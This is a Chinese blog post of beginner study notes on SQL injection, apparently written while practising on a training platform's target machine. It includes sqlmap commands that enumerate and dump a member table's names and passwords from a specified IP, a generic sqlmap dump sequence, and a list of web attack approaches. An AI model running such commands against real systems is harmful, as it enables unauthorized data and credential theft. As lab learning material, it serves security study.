sql注入攻击的入门


学习笔记
1月12日


使用某攻防平台中的靶机对sql的布尔盲注的学习进行了验证

进入靶场环境,给出一个网站的页面。
首先寻找注入点,小白刚入门不是很会,所以注入点找了一会,就在通知里面,然后使用sqlmap来跑很快就搞定了

sqlmap.py -u “http://219.153.49.228:40014/new_list.php?id=1” --dbs
sqlmap.py -u “http://219.153.49.228:40014/new_list.php?id=1” -D stormgroup --tables
sqlmap.py -u “http://219.153.49.228:40014/new_list.php?id=1” -D stormgroup -T member --columns
sqlmap.py -u “http://219.153.49.228:40014/new_list.php?id=1” -D stormgroup -T member -C name,password,status --dump

最后得到两个密码,解密后的密码登录系统就得到了Key


对web网站进行渗透思路
1.万能语法
2.通过sql注入 在url地址栏数日数据库的注入语法
3.暴力破解
4.burp抓包
5.xss、csrf

注入漏洞在owasp top10 排行第一

系统漏洞

sql注入:
sql注入漏洞就是后台对用户输入的内容没有做合法性的验证和判断,用户构造恶意的sql语法输入带入数据库,从而实现对数据库的操作

手工找漏洞:
经验:

1.找到注入点,如何找到注入点?  
参数值传递的方法:  
GET方法   
POST方法  
sql注入点:存在位置一定是一个动态页面,注入点一定是在参数的位置

学习内容:找到book网站的sql注入漏洞

盲注:是sql注入的一种,有两种方式:一种是布尔盲注,一种是时间盲注
方法:通过burpsuite抓包
信息收集:
数据库:mysql 5.0.12
语言:Php
系统:windows
中间件:PHP 5.4,Apache 2.4.23

爆库:
sqlmap.py -r 路径 --dbs
sqlmap.py -r 路径 -D 库名 --tables
sqlmap.py -r 路径 -D 库名 -T user --columns
sqlmap.py -r 路径 -D 库名 -T 表名 -C 列名,列名 --dump

在这里插入图片描述
在这里插入图片描述

sqlmap
1.python环境
2.sqlmap部署

任务:利用book的注入漏洞,拿到数据中的所有数据。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值